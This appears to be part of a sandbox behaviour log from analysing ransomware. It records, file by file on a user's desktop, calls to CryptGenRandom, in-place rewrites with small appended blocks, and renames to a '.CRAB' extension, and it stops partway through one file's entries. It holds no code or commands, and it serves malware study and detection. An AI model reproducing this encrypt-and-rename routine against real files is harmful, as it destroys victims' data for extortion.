| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a, destination_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif, size = 1048576, size_out = 35440 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif, size = 35440 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif, destination_filename = C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav, size = 1048576, size_out = 46763 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav, size = 46768 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav, destination_filename = C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx, size = 1048576, size_out = 102234 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx, size = 102240 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx, destination_filename = C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif, size = 1048576, size_out = 35820 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif, size = 35824 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif, destination_filename = C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js, size = 1048576, size_out = 3717 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js, size = 3728 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js, destination_filename = C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp, size = 1048576, size_out = 65825 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp, size = 65840 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp, destination_filename = C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp, size = 1048576, size_out = 34573 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp, size = 34576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp, destination_filename = C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi, size = 1048576, size_out = 9135 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi, size = 9136 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi, destination_filename = C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav, size = 1048576, size_out = 64225 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav, size = 64240 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav, destination_filename = C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods, size = 1048576, size_out = 83925 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods, size = 83936 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods, destination_filename = C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a, size = 1048576, size_out = 65667 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a, size = 65680 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a, destination_filename = C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx, size = 1048576, size_out = 24421 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx, size = 24432 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx, destination_filename = C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi, size = 1048576, size_out = 94243 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi, size = 94256 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi, destination_filename = C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv, size = 1048576, size_out = 53031 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv, size = 53040 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv, destination_filename = C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg, size = 1048576, size_out = 71708 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg, size = 71712 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg, destination_filename = C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav, size = 1048576, size_out = 61386 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav, size = 61392 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav, destination_filename = C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp, size = 1048576, size_out = 74594 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp, size = 74608 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp, destination_filename = C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3, size = 1048576, size_out = 77624 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3, size = 77632 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3, destination_filename = C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
